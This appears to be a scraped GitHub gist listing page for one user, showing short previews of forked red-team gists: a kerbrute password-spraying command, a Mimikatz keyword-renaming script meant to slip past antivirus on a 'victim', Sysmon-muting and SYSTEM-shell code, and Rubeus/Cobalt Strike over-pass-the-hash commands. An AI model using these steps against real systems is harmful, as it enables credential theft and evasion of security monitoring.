With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
EspressoCake
EspressoCake
/ clr_via_native.c
Created
April 28, 2020 20:05
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
EspressoCake
/ mimikatz_obfuscator.sh
Created
June 25, 2020 22:04
— forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/windows | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
EspressoCake
/ impersonate.go
Created
July 8, 2020 16:33
— forked from kostix/impersonate.go
A demonstration example for http://stackoverflow.com/a/26124494
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A demonstration example for http://stackoverflow.com/a/26124494 | |
| // It runs a goroutine locked to an OS thread on Windows | |
| // then impersonates that thread as another user using its name | |
| // and plaintext password, then reverts to the default security | |
| // context before detaching from its OS thread. | |
| package main | |
| import ( | |
| "log" | |
| "runtime" |
EspressoCake
/ dllmain.go
Created
July 13, 2020 17:12
— forked from NaniteFactory/dllmain.go
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| //#include "dllmain.h" | |
| import "C" |
EspressoCake
/ MuteSysmon.cs
Created
July 14, 2020 16:08
— forked from Flangvik/MuteSysmon.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Text; | |
| namespace MuteSysmon | |
| { | |
| class Program |
EspressoCake
/ powershell.go
Created
July 14, 2020 16:15
— forked from brgnepal/powershell.go
Playing PowerShell command via Golang
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "bytes" | |
| "fmt" | |
| "os/exec" | |
| "strings" | |
| ) | |
| // PowerShell struct |
EspressoCake
/ SystemCMD.cpp
Created
July 25, 2020 16:46
— forked from masthoon/SystemCMD.cpp
Launch SYSTEM CMD in user current session (from a service)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
EspressoCake
/ gist:0d8b2d37c1360ec9a91eec595ad9711c
Created
July 27, 2020 17:00
— forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
EspressoCake
/ go-sharp-loader.go
Created
August 5, 2020 19:47
— forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
EspressoCake
/ kerberos_attacks_cheatsheet.md
Created
August 14, 2020 17:59
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
OlderNewer